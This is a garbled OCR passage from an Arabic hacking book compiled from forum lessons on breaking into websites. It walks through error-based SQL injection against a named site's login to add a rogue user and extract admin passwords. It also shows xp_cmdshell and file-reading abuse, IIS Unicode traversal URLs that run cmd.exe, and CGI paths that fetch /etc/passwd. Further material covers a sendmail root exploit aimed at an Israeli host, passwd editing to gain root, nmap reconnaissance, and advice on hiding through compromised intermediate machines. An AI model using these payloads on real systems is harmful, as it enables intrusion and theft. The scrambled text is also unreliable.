/arabic/Scripts/ar_csd_reply.asp, line 33

usernameوهو ما يفيد بأنه ل يوجد عمود في هذا الجدول له السم password ,username,id,userid,emailنقوم بتجربه السماء الشائعه مثل

,first_name فأننا نحصل على خطأ أخر وهو ما نبحث عنه useridعند تجربتنا لـ

اقتباس:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14 '

]Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.passwd' is invalid in the select list because it

is not contained in either an aggregate function or the GROUP BY clause .

/arabic/Scripts/ar_csd_reply.asp, line 33

228

Page 229: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

cs_isp_userهنا حصلنا على معلومتين وهي أسم الجدول وهو passwdوأيضا أسم أحد العمده وهو

نقوم الن بتكرار العمل السابق ولكن بإستخدام اسم العمود الجديد)--blah' group by (passwdفنقوم بإدخال أسم المستخدم التالي :

فنحصل على الخطأ التالي :

اقتباس:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14 '

]Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.UserID' is invalid in the select list because it is not contained in either an aggregate function or the GROUP

BY clause ./arabic/Scripts/ar_csd_reply.asp, line 33

userid وهو نفسه ما قمنا بتخمينه وهو UserIDحصلنا على أسم عمود وهو ليس حساس لحالة الحرف :)MS SQL Serverتجدر الشاره إلى أن

passwd و UserIDنلحظ أننا سنكون في حلقه غير منتهيه ول نحصل إل على أسماء الجداول إذن الجدول ل يحوي إل على عمودين وهي التي حصلنا عليها

إذن في الحاله هذه نقوم بأدخال مستخدم جديد للجدول وبعدها نقوم بالدخول بشكل طبيعي من الصفحهالخاصه بتسجيل الدخول :)

blah' INSERT INTOسنقوم بكتابة التالي في خانة أسم المستخدم : cs_isp_user(UserID,passwd

(VALUES('M_3','hi--('hi وكلمة مرور M_3حيث سيتم إضافة مستخدم جديد له أسم مستخدم

وبعدها تستطيع الدخول للصفحة المحميه بهذه البيانات على أنك مخول له بالدخول

لها ولكننا سنكمل الحديث عن طريقهinjectفي مثالنا (شركة التصالت) أنتهينا من استغلل أمكانية عمل ممتعه لكي نستطبع قرائة اسماء المستخدمين وكلمات مرورهم وبعدها تستطيع الدخول بأي منها دون إضافة

نفسكوهو المر الذي لن يضع شكوك حول وجود لشخص مشبوه

وهو رقم تسلسلي لكل مستخدم ( تذكر أنه رقم)idسنكمل ما بدأناه ولكن بإضافة عمود أخر له السم userإذن لدينا جدول أسمه يحوي العمده التاليه

idوهو رقم صحيح username وهو قيمة نصيه ( القيم النصيه يمكن أن تحوي أرقام) مثال admin1

passwdوهي أيضا قيمه نصيه

لقيمه نصيه وتحويلها إلى قيمة عدديه ( لن يتم التحويل ولكنه سيخرج رساله خطأunionنجرب عمل ثمينه جدا)

blah' union SELECT username FROM userندخل اسم المستخدم : و سنحصل على رسالة خطأ ل تفيدنا في شيء

رسالة الخطأ هي

اقتباس:

229

Page 230: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Microsoft OLE DB Provider for ODBC Drivers error '80040e14 '

]Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target

lists ./admin/admin.asp, line 13

مره واحد فتصبح بالشكل التاليidنقوم بزيادة blah' union SELECT username,username FROM user

فنحصل على نفس رسالة الخطأنتابع الزياده إلى أن نحصل على رسالة خطأ مختلفه

لنفترض أننا حصلنا على رسالة الخطأ الجديده عند أدخال اسم المستخدم التاليblah' union SELECT username,username,usernam

e,username,username FROM userفنحصل على رسالة الخطأ التاليه

اقتباس:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

]Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the

varchar value 'Lame_Admin' to a column of data type int./admin/admin.asp, line 13

:) حصلنا على أول أسم مستخدم وهو عادة ما يكون للدمن أن يقوم بتحويل قيمة نصيه (وهيSQLوسبب ظهور هذا الخطأ هو لننا نطلب من محرك

Lame_Admin )إلى قيمة عدديه صحيحه (int( إلى قيمة عدديهLame_Adminوهو الشيء الغير مسموح , لذلك يقوم بأخبارك أنه ل يستطيع تحويل

بعمله :)microsoftصحيحه :) هذا أذكى شي قامت الن حصلنا على أسم المستخدم وسنحاول الحصول على كلمة المرور

blah' union SELECT passwd,passwd,passwd,passندخل أسم المستخدم التالي :wd,passwd FROM user

بنفس العدد السابق عند حصولنا على أسم المستخدمسنحصل على هذا الخطأ

اقتباس:

Microsoft OLE DB Provider for ODBC Drivers error

230

Page 231: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

'80040e07']Microsoft][ODBC SQL Server Driver][SQL Server]Syntax

error converting thevarchar value 'stupid' to a column of data type int.

/admin/admin.asp, line 13

حصلنا على أسم المستخدم وكلمة المرور ويمكننا تسجيل الدخول للصفحة المحميه بدون وجود أي أثر لنا إل إذا كانت الصفحه المحميه عند الدخول لها تقوم بطباعة بعض المعلومات مثل رقم اليبي لخر شخض قام

بالدخول بإسم المستخدم هذاعندها فكر بما ستقوم به بنفسك

Stored Procedureبقي أتكلم عن الـ تقوم بعمل محدد عند طلبهاBuilt-inوهي كتشبيه أقرب إلى أدوات موجوده مسبقا

sa يعمل على المستخدم SQL Server إذا كان الـ Stored Procedureستستطيع الستفاده من الـ تم السماح له باستخدامهاSQL Serverأو إذا كان المستخدم الذي يعمل عليه الـ

بهذه المكانيات SQL Serverلذلك فأنت محظوظ عند حصولك على

Stored Procedure 100يوجد أكثر من في الجدول التالي أهمها

---------------------------++------------------------------------------------------------------------------+

|xp_cmdshellتمرير أمر لنظام التشغيل ( يتم تنفيذه على حسب صلحيات |---------- المستخدم)-------|

|xp_regreadقراءة قيمة مفتاح في |----------- الريجستري--------------------------------------------|

|xp_regdeletekeyحذف مفتاح من |---- الريجستري-------------------------------------------------|

|xp_regdeletevalueحذف قيمة مفتاح من |- الريجستري--------------------------------------------|

|xp_regwriteللكتابة في |---------- الريجستري-------------------------------------------------------|

|xp_servicecontrolلبدأ أو أنهاء خدمة على |-- السيرفر--------------------------------------------|

----------------------------++-----------------------------------------------------------------------------+

فهي بالشكل التاليProcedureأما طريقة الستفاده من أي من هذه الـ 'exec master..xp_cmdshell 'dir

والبقيه مثلهxp_cmdshellهذا مثال لطريقة أستخدام عدا الكتابة في الريجستري فهو بالشكل التالي

'exec master..xp_regwrite 'REGISTERY KEY' VALUE

231

Page 232: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

التي يعمل عليها الموقع عن طريق إضافة جدولaspأيضا بقي الشاره إلى أنه بأمكانك قراءة كود ملفات ووضعه aspجديد ومن ثم نسخ كود صفحة

في هذا الجدول بالطريقة التاليه))CREAT TABLE M_3 ( source varchar(8000

8000 حجمه varchar وبداخله عمود واحد من النوع M_3هذا السطر يقوم ببناء الجدول وأسم الجدول بايت

بعد ذلك بأمكانك الن إضافة أي ملف على السيرفر إلى هذا الجدول ومن ثم قرائته بالشكل التالي'bulk insert M_3 from 'c:\InetPub\wwwroot\login.asp

ولقرائة ما تم نسخه يمكنك ذلك عن طريق رسائل الخطأ اللي تكلمنا عنها في الموضوع السابق حيث يتم توليد رسالة خطأ بها ما تم نسخه.unionأسهلها هو عمل

انتهى،،،

" درس لحتراف الهاك في اختراق المواقع "

<ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة> >CONIK <ةةةةةة:

أن شاء ال في تعلم أختراق المواقع وكيف يتم ولكن في البداية يجب أن نعلم أشياء عن الختراق

في البداية أو بمعنى أخر نعرف أساسيات مطلوبة في علم اختراق المواقع وطبعا نحن قلنا

في الدرس الول الى كان عن اختراق الجهزة أنه الى بى هو الباب والبورت هو المفتاح له

بس في أختراق المواقع يوجد لنا باب ولكن المفتاح يختلف وهو الثغرات ومافي اختراق في الدنيا

بدون ثغرة المهم المفروض ما نقول ثغرة ولكن نقول ضعف أمنى :-

:- طيب ممكن تقول لى أيش هي الثغرات يعنى تعريف لها ؟؟1س

جـ:- الثغرات هى ضعف أمنى يساعدك فى دخول نظام معين وأختراقه وقد تكون أيضا الطريقة المساعدة

232

Page 233: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

يعنى من مستخدم الى المدير المتصرف وتتضمنadministrator الى userالتى تخليك تتحول من ويجب

على الدوام معرفة الثغرات المنيه الجديدة وأستثمارها علشان ل يتنبه أصحاب المواقع بيها

يرقعوها ( يتم تقفليها )

وأقرب مثال لهذه الثغرات الضعف المني الذى أكتشف في الباتشى وهو سيرفر يركب على نظام ليونكس

وأى ضعف فى أحد البرامج أو قاعده بناء الموقع تعتبر ثغرة ومن الممكن استخدامها والستفاده

منها في أختراق الموقع المراد أختراقه والتحكم في الموقع ومشاهدة الباسوردات وكل ما تريد عن طريقها

:- طيب كيف انا استثمر الثغره اذا انا لقيتها ؟؟؟2س

وانتهC% من الثغرات تكون سكربتاتها مكتوبه بالغه 99جـ:- من وقت ما أكتشفوا الثغرات كانت نسبة تحتاج لمعرفة هذه اللغه أو

عليك تحويلها .

حتى انته تتمكن من الستفاده من هذه الثغره أو بمعنىshellكما أن هناك العديد من الثغرات يحتاج الى أخر الضعف

ومن هذه الكلم.Shell PHP تحتاج الى PHPوعلى سبيل المثال بعض الثغرات الموجوده فى

وعلى فكرة الضعف يكون في الصدارات الخاصة

ولكن هذه المرة في نظام تشغيل ليونكس Kernel 2.2.xوكمان في ثغره من نوع

تكون سيكربتات توجوده فى الموقع ) وهناك أيضا سيكربتاتC( ملحظه هذه الثغرات التى تكون باللغة perlأخرى مكتوبة باللغه

linux Redhat 7.3ولزم فى هذه الحالة تكون انته مركب لوينكس علشان الوامر وأنا أنصحك تركب

لنه أفضل من الماندريك وأذكر انه الخ بلك هانتر لمن انا سألته أركب الماندريك ول الريد هات قال لى انهالماندريك صورة مبسطه

233

Page 234: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

للريد هات بس غير قابله للتطور وأنه الريدهات أقوى وجزاة ال خير على هذه النصيحة نرجع للموضوع

:- كيف أحول لغه البيرل ؟؟3س

جـ:- الطريقة مره سهله كلها اوامر عادية في البداية انته سوى هذه المر

/.file.pl

تعطيك هذه الرسالة

Access Deniedهذه الرسالة توضح عدم الموافقه ----

أذا صار لك كذا كا عليك سوى كتا بته المر هذه

chmod +x Conik.pl لحظ مكان كونيك انته تكتب أسم الملف -----

وشغلة مره ثانية وشوف النتجيه راح تكون زى كذا /. $Conik.pl

C:- طيب بالنسبة للغة 4س

جـ:- علشان تحويل الملف لزم انته تخلى الملف يكون ملف تنفيذى بهذه المر

gcc -o Conik Conik.c لحظ انه انته تكتب أسم الملف بدال أسمى كونيك المراد تغيرة <------

يعنى على سبيل المثال :-

gcc -o Conik conik.c

وراح يكون الملف جاهز بعد هذه المر

/.Conik.c

وبعد ماصار الملف جاهز

$gcc -o sendmail sendmail.c

/. $sendemail

Usage : sendmail <host> <OS> <user> <password</. $sendmail smtp.israel.com RedHat-7.3 anonymous anonymous<-----

234

Page 235: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

israelلحظ انك انته تكتب هنا الموقع الى تبغاه مكان connecting to host...

connected...id

uid=0(root) gid=0(root(

وكمان طلب نظام التشغيل واليوزر والباسورد Sendemailلحظ انه طلب ممنا الملقم للبرنامج

Exan nofer بسبب قيام البرنامج بتنفيذ الـRootوبعد هذه كله البرنامج أعطانا أمتياز

بدون اى سبب أنا حطيت لك هذه المثالXXX. SENDMAILملحظة ل تضن أنه لمن انا حطيت البرنامج لنه هناك ثغره فى هذه البرنامج

وراح أشرحها لك أن شاء ال تعالى بس كان بدى تحفظ السم هذه :-)

الظاهر انه نحنا أتوغلنا فى الموضوع زايدة عن اللزوم :- يا ال كل هذه علشان ثغره بس بطلت أنا ما أبغا اتعلم 5س

جـ:- لووووول حبيب البى هذه الطريقة المعقده شوية للثغرات في ثغرات ثانية حلوة وسهله جدا جدا

Perl و C ترى هذه الطريقة يبغالها نظام تشغيل وكمان لغه Conik:- أيش هي قو ل يا 6س

في تغرات تستخدم من خلل المتصفح يعنى انته تشوف ملعومات الموقع عبر المتصفح وتوصل الى ملفالباسوردات من هذه الطريقه

PHP - CGI - UNICODE - VB - etcومثال على هذه الثغرات

أنا سمعت عنها كثير نفسى اشوف كيف شكلها وأعرف ويش هى ؟؟؟UNICODE:- اوووووة 7س

مما تساعد في أختراقMicrosoft في IIS هى عبارة عن ضعف في نظام UNICODEجـ:- حبيبى الموقع بكل سهوله عموما الختراق بهذه الطرق سهل جدا

:-UONICODEمقارنة بالطرق السابقة التى تم ذكرها من قبل وسوف أضع أمثله على ثغرات

_/vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi

nnt/system32/cmd.exe?/c+dir+c\:

/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir

+c\:

/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:

235

Page 236: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c\:

/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c\:

UONICODEحاولت قد المستطاع انى أشكل فى أنواع

هذه مثال عليها CGIأما بالنسبة الى ثغرات الـ

/cgi-bin/view-source?../../../../../../../etc/passwd

/cgi-bin/phf

/cgi-bin/wwwboard.pl

/cgi-bin/AT-admin.cgi

/cgi-bin/info2www

/cgi-bin/environ.cgi

هذه وباقى العديد من الثغرات يعنى ل يقتصر المر على هذه الثغرات وراح أقسم الثغرات لك بحسب نظامالتشغيل

NT : Uni code , bofferoverfollow , tftp

Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , ProFTPD, WU-FTPD, Kernel Exploits, rootkits ,

UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel exploits, rootkits, ProFTPD, WU-FTPD ,

انتهى،،،

236

Page 237: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"استغلل لينكس في اختراق المواقع "<ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة>

>Black_sNiper <ةةةةةة:

هذا الموضوع مخصص لمن أراد التعامل مع لينكس في اختراق المواقع وليس لديه الخبرة الكافية فيه... سوف يكون هذا الموضوع عن العمليات التي يستحسن القيام بها بعد الحصول على كلمة السر والنجاح في

الدخول على النظام.. أول يجب ان تعرف بأنه يمكن ان تدخل على بعض النظمة باستخدام بعض الكلمات المشهورة وتوجد بعض

النظمة تسمح لك بتنفيذ أمر واحد ثم تقوم باخراجك من النظام بعد ذلك وأفضل تلك الوامر هي :.

who rwho

finger

237

Page 238: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

وتستفيد من هذه الوامر بأنك تستعرض اسماء المستخدمين للنظام وبذلك يمكن ان تستخرج كلمة السر مننفس السم وذلك لن بعض المستخدمين يستعمل كلمة سر مشابهة تقريبا لسمه مثل :.

username : Black password : Black2

demo أو testوفي بعض النظمة تستطيع الدخول بكتابة

من الملفات المهمة والتي يجب عليك استخراجها بعد دخولك على أي نظام :. /etc/passwd /etc/group /etc/hosts /usr/adm/sulog /usr/adm/loginlog /usr/adm/errlog /usr/adm/culog /usr/mail /usr/lib/cron/crontabs /etc/shadow

:. binالحساب وهو مهم حيث يحتوي على حساب المستخدم ويوجد به معظم الملفات المهمة وقد يوجد ملف كلمة السر واذا

كان كذلك فيمكن (أحيانا) اضافة كلمة سر خاصة بك وتضيف حساب دخول (روت) لك !!

والطريقة بسهولة كالتالي :. ed passwd $

وتكتب أي اسم وبذلك تكون انت مدير النظام!! exec loginوأخيرا تقول

ما الذي سوف تواجهه عند دخولك على أي نظام بكلمة سر واسم مستخدم ؟!! عند دخولك الى النظام ستقابل احدى هذه الحتمالت :.

اما انك استطعت الحصول على حساب مدير النظام (الروت) أو انك حصلت على حساب مستخدم آخر.. في البداية تكتب المر التالي :.

pwd $ والنتيجة تظهر :.

usr/admin $ /النتيجة اظهرت انك استطعت الدخول على المدير وبذلك تستطيع التعامل مع كامل النظام بدون قيود..

اذا ظهرت نتيجة غير تلك النتيجة .. فمثل : usr/Black $ /

فهذا يدل على انك دخلت على حساب هذا المستخدم!! ولعرض ملفات هذا المستخدم تكتب التي :.

ls /usr/Black $ وسوف يعرض لك ملفات هذا المستخدم :.

mail pers

games bin

profileولكن هذا لن يعرض ملف .ولكي تستعرضه تكتب التي :.

cd $

238

Page 239: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ls -a $ : :.profile

$

اذا اردت قراءة محتويات ملف فسوف تكتب المر التالي :. cat letter $

letterوهذا اذا افترضنا ان الملف المطلوب هو

اذا اردت تغيير كلمة السر فما عليك ال ان تكتب :. passwd $

ثم سيطلب منك كلمة السر القديمة وهي طبعا معك!! وتدخل كلمة السر الجديدة ..

للبحث عن معلومة معينة تكتب المر التالي :. grep phone Black $

وهذا بافتراض انك طلبت ارقام الهاتف الخاصة بالمستخدم الخر

ولعمل نسخ من ملف الى ملف آخر تكتب التي :. cp letter letters $

اذا اردت عمل محادثة مع مستخدم آخر على اتصال فتكتب المر التالي :. write $

ولمعرفة من يوجد على النظام نكتب التي :. who $

safadM tty1 april 19 2:30 paul tty2 april 19 2:19

gopher tty3 april 19 2:31

واذا اردت قراءة الملف المحتوي على كلمات السر المظللة يجب ان تكون قد دخلت على النظام باستخدامحساب المدير نفسه .. ولستعراض ملف كلمات السر نكتب :.

cat /etc/passwd $ root:F943/sys34:0:1:0000 :/:

sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh

وقد يظهر حساب آخر للمدير كالتالي :. Black:chips11,43:34:3:Mr doooom:/usr/Black :

وهذا يعني انه يمكن للمستخدم الحتفاظ بكلمة السر لمدة ثلثة اسابيع بدون تغيير وانه يجب ان يغيرها كلستة اسابيع ..

استعراض ملف المجموعة كالتالي :.

ls /etc/group $

root::0:root adm::2:adm,root

bluebox::70 :

239

Page 240: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ويمكن ان يحتوي ملف المجموعة على كلمات سر أو ليحتوي !! اذا كان ليحتوي على كلمة سر فانه يمكن ان تصبح انت مديرا للنظام في حالة دخولك بكلمة سر لمستخدم

عادي وليس كمدير للنظام وذلك بعدة طرق ..

انتهى،،،

" شرح مفصل من اللف إلى الياء في احتراف اختراقالمواقع عن طريق لينكس "

<منقول><الكاتب: ايسر >

UNix Usage IN HackinGاهل بكم جميعا

up to dateفي البدايه احب ان انوه ان هناك العديد من الدروس الجميله فعل .. و لكنها قديمه و ليست لذلك اكتب لكم هذاالدرس المطول لكي يكون مكانا للمبتدئين يمكن ان يستفيدوا منه

و اتمنى فعل ان يحوز على اعجابكم :)-بعض المصطلحات الهامه :

و غيرهاpc , servers , supercomputersكثير من الناس يحبون ان يطلقوا على كل من ال BOXكلمه

النظام الذي سوف نقوم باختراقه يحتوي عاده على العديد من اليوزرز ..بالضافه لليوزرز ,superuser ... و هو يكونrootتسطيع ان تطلق على الرئيس هناك كلمه

و هو الدمين او المدير على النظام....

240

Page 241: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

بالنسبه لنظمه التشغيل : .. بل تحتاج الى اي نظام مشتق من نظامwindowsطبعا .. ل يمكنك ان تخترق باستخدام نظام التشغيل

التشغيل اليونيكس ..حسنا .. السؤال هو لماذا هذه النظمه بالذات ... و لماذا ل يصلح الويندوز؟؟

لسبيبن : . nt-النترنت اغلبه اجهزه شغاله على اليونيكس سيستمز ...و نادر لما تلقي جهاز شغال على الويندوز 1

9x اذن اقل حاجه حتى تخترق جهاز او سيرفير شغال على اليونيكس ..يجب ان تكون ملما بنظام التشغيل هذا..

لذا من الفضل انك تركبه في جهازك ..-طبعا .. معظم اادوات و اكواد الكسبلويتات مصممه للعمل في بيئه اليونيكس ..2

اوكي ... ما هي توزيعات اليونيكس ؟؟و اللينكس ؟؟بالنسبه لليونيكس .. فهو منقسم الي قسمين :

- يونيكس تجاري .( غير مجاني )1open source- يونيكس مفتوح المصدر و مجاني 2

بالنسبه لليونيكس التجاري ل يمكن ان تركبه على جهازك العادي ..لذا فيمكنك تجاهله الن :)اما المجاني فيوجد منه عده عائلت

-BSD و هي القدم و الصعب في الستعمال .. و من الفضل لك ال تستعملها ال اذا كنت ترغب في تركيب سيرفير

على الجهاز ...

يوجد اللينكس ..و هو طبعا غني عن التعريف ( لم اجربها و لكن اسمع الكثير منSuSeطبعا .. يوجد منه العديد من التوزيعات و ان كان افضلها هي

الناس يشكرون في هذه التوزيعه ) و قد و ضعت هنا بعض الدروس الخاصه بالمندريك MDKاما بالنسبه لسهل توزيه فهي

يمكنك تحميلها و قرائتها ..ان لم تجد مكانا تحصل منه على اللينكس يمكنك مراسلتي على ايميلي و نحدد مكانا

( ثمن السطوانات البلنك و النسخ فقط )7.2 او الريد هات 9لتسليمك نسخه من الماندريكعلى اي حال .. للينكس مميزات كثيره ..امن ... مستقر .. مجاني .. يمكنك تطويره ليلئم امكانيات جهازك ..

- النترنت

.. ماذا ... تريد ان تخترق ..جميل جميل .. تريد ان تخترق جهازك ام ماذا ؟؟اه..تريد ان تخترق اجهزه مبحره في النترنت ...اذن ..دعنا نبحر على النترنت :)

انا عارف انك حصلت على الدرس ده من النترنت .. لكن هذا كان عن طريق الويندوز

.. لكن انت اليوم انسان مختلف... انت انسان لينكسي .. ذه فلسفه محترمه ..اذن يجب ان تبحر الى النترنت من نظام اليونيكس .. لن اساسا يجب ان تعرف المودم بتاعك على اللينكسحسب التوزيعه اللي عندك .. حاول تعرف المودم .. حتلقي ان اللينكس لم يجد اي مودم موصل بالجهاز ؟؟

ما هذا .. ل تتعجب .. ..winmodems يطلقون عليها internalفكل المودمات الداخليه

.. ارجوك ل تلوم اللينكس ..windowsلماذا لنها مصممه اساسا للعمل تحت نظام التشغيل بل يجب ان تلوم صانع كروت الفاكس الداخليه هذه :)

real or true modems فهو مودم حقيقي externalاوكي ..اما بالنسبه للمودم الخارجي acorp , u.s. robotics... يوجد العديد من المودمز الخارجيه مثل

USB و ليس serialيجب ان تتاكد ان المودم يكون على اي حال خلينا في موضوعنا...

وذلك من خلل نظام الليونيكس :)ispخلص .. ادخل على النترنت من خلل ال

241

Page 242: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

اهم حاجه قبل الشروع في الختراق هي ان تحاول ال يتم اليقاع بك و كشف محاولتك لختراق سيريفيرمعين ..

و طبعا هنك و سائل عديده لذلك لن اتطرق اليها لن هناك العديد من الشروح المتميزه في مجال الحمايهوازاله الثر

الخصهم في نقطتين او ثلثه : -ايك ان تحاول ان تسجل في موقع تحاول اختراقه .. و ل حتى باسامي مزوره لن هذا قد يجعلك عرضه1

لكشف الي بي الخاص بك ثم رقم هاتفك و صباح الفل ...ت ispو من ثم ال

- اياك ان تتباهى باختراقاتك ابدا اما غير المهتمين بامور الهاك ...2 -احاول ال تخترق دائم من خلل جهازك ... ل ل .. انت فهمتني غلط .. مش قصدي يعني تروح لنت3

كافيه :)جهازك =====> الجهاز الضحيه ... ده مش مامون ..لكن

جهازك======> جهاز وسيط======> السيرفير الضحيه ...ده كده كويس اوي طيب ايه الجهاز الوسيط ده.. ده ممكن يكون مثل جهاز مخترق من قبل او شيل اكاونت .

طيب ماهو الشيل اكاونت: هو عباره عن خدمه حيث يمكنك من خللها التحكم في جهاز من بعيد و هذاالجهاز عليه نظام اليونيكس

طبعا من غير ان تقوم باختراق هذا الجهاز ..و يوجد العديد ممن يقدمون هذا الحدمه مجانا .. وedu او سيرفيرات اجب عليك قبل ان .gov .mil- حاول ان ل تخترق اجهزه خطيره و مهمه مثل .4

غيرها من هذا النمط.- هذه النقطه تعتمد على بعض تقنيات الفريكينج .. لعمل اخفاء لرقم تليفونك عن مزود الخدمه لديك .5

REdirecting

:TCP-فحص المواقع ومنافذ ال

يجب عليك قبل ان تقوم بالختراق ان تعرف كيف يمشي النترنت .. انه يعتمد على بروتوكول يدعىTCP\IP

و بعض البروتوكولت الخرى ....Dطيب ... ركز معايا ابوس ايدك =

المفروض ان كل جهاز على النت بيكون فيه بورتات مفتوحه ..هذا البورتات يمكنك ان تقوم من خللهابارسال الداتا

من جهاز الى ذلك الجهاز ..هذه البورتات المفتوحه ( المفتوحه فقط ) تكون على استعدد دائما لتلقي الداتا منريموت بوكس

>>serviceدائما ما ترتبط البورتات المفتوحه بما يسمى بخدمه .. daemon or server تكون مستضافه من خلل ديمون serviceو هذا الخدمه

اذن .. الديمون هذا اذا قام صاحب الموقع بفتحه في السيرفير فانه يقوم بفتح منفذ في السيرفير ..لكي يقومDالديمون هذا من خلله بتقديم الخدمه الملعونه =

و هذه بعض الخدمات مع البورتات الخاصه بهم ..لكن طبعا هناك كثيير

21FTPFTPd23Telnet telnetd25SMTPsendmail (yes(!80HTTPapache

110POP3qpop daemon اختصار لكلمه ftp , telnet ..etc في اخر كلمه d حرف

ماالذي يحدث ؟؟www.host.netمثال : لو سيادتك قمت بزياره هذا العنوان من خلل المتصفح مثل

80 رقم TCPيقوم المتصفح بالتصال بالموقع من خلل بورت ال ثم يقوم بارسال المر

GET /HTTP/1.1 /index.html.. واوامر اخرى كثيره index.htmlثم بعد ذالك يقوم الموقع المطلوب بارسال كود الهتمل الخاص بالصفحه

242

Page 243: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

دي مليئه بالثغرات المنيه الخطيره ...و هوه ده اللي احنا محتاجينهdaemonsالشيء الطريف ان ال

<=

الموجوده عل السيرفير لذلك يجب عليكdaemonsاذن لكي تقوم باختراق موقع يجب ان تعرف اي ال ان تعرف

ماهي المنافذ المفتوحه في السيرفير المستهدف ...اذن كيف تحصل عى المعلومات هذه .. ... السكانرز هي عباره عن برامج تحول ان تتصل بالسيرفير المستهدفport scanersمن خلل ما ال

من خلل جميع المنافذ ..و ذلك لمعرفه اي البورتات المفتوحه و لحسن الحظ يوجد نسخهfyodor بواسطه nmapفي هذا السيرفير ...اشهر هذا السكانرز هي الداه

منها خاصه بالويندوز و ..!! ايه ده ..؟؟احنا مش اتفقنا ننسى الويندوز ده خالص =<

http://members.lycos.co.uk/linuxdude/e3sar/ rpm على هيئه nmapطيب..بالنسبه للينكس يمكننا ان نحصل على نسخه

و لتركيبها اتبع التالي :bash-2.03$ rpm -i nmap-2.53-1.i386.rpm

كمثال لموقعtarget.eduثم نقوم بالتشغيل .. و ان شاء ال سنحاول على مدار الدرس باستخدم الموقع

مستهدف ..اتبع التالي :

bash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by [email protected] ( www.insecure.org/nmap( /

Interesting ports on target.edu (xx.xx.xx.xx:()The 1518 ports scanned but not shown below are in state: closed(

Port State Service21/tcp open ftp23/tcp open telnet25/tcp open smtp80/tcp open http

110/tcp open pop3

Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

بعمل فحص شامل على الموقع و قام بمعرفه المنافذ المفتوحه كم ترى!!nmapاذن لقد قام ال target.edu الموجوده في الموقع daemonsاذن يمكننا ان نعرف ايضا اي الخدمات و ال

لكن يلزمنا اداه معينه للتصال بالموقع من احد هذا المنافذ ..فكر معي ماهي هذه الداه؟؟؟نعم انها التلنت .. اه .. صحيح ان التلنت هوه خدمه ..من خلل التلنت ديمون .. و لكنه ايضا عباره عن

...تعال نشوف مثال :TCPبرنامج بسيط ..يمكنك من خلله التصال باي موقع بمنفذ معين من خلل ال

bash-2.03$ telnet target.edu 21Trying xx.xx.xx.xx...

Connected to target.edu.Escape character is.'[^'

220 target.edu FTP server (SunOS 5.6) ready.

243

Page 244: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

quit221 Goodbye.

Connection closed by foreign host

اهااااادول دلونا على معلومات قيمه اوي اوي :)

SunOS 5.6- نظام التشغيل هناك هو 1sunOS اللي بييجي مع نظم السن standard- ديمون الف تي بي هناك هو ال2

تعال نجرب بورت تاني نتصل بيه من التلنت :

bash-2.03$ telnet target.edu 25Trying xx.xx.xx.xx...

Connected to target.edu.Escape character is.'[^'

220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0400) EDT(quit221 2.0.0 target.edu closing connection

Connection closed by foreign host.

و ان اصدار ه هوsendmail هو ال smtpايضا استفدنا معلومات قيمه هي ان ديمون 8.11.0/8.9.3

جميل حميل ..طيب لماذا نحتج الى هذا المعلومات ؟؟ لن الكسبلويت و الثغره الموجوده دائما تعتمد على الموجود و على نظام التشغيل ..لكن توجد مشكله وهي ان بعض المكعلومات قد يمكن انdaemonال

تكون مزوره او غير صحيحهازاي ؟؟؟تابع معايا كده :

nmapبالداه bash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by [email protected]

( www.insecure.org/nmap( /Interesting ports on target.edu (xx.xx.xx.xx:(

)The 1518 ports scanned but not shown below are in state: closed(

Port State Service21/tcp open ftp23/tcp open telnet25/tcp open smtp80/tcp open http

110/tcp open pop3

TCP Sequence Prediction: Class=random positive increments Difficulty=937544 (Good luck(!

Remote operating system guess: Linux 2.1.122 - 2.2.14

Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

244

Page 245: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

يانهار اسود :|

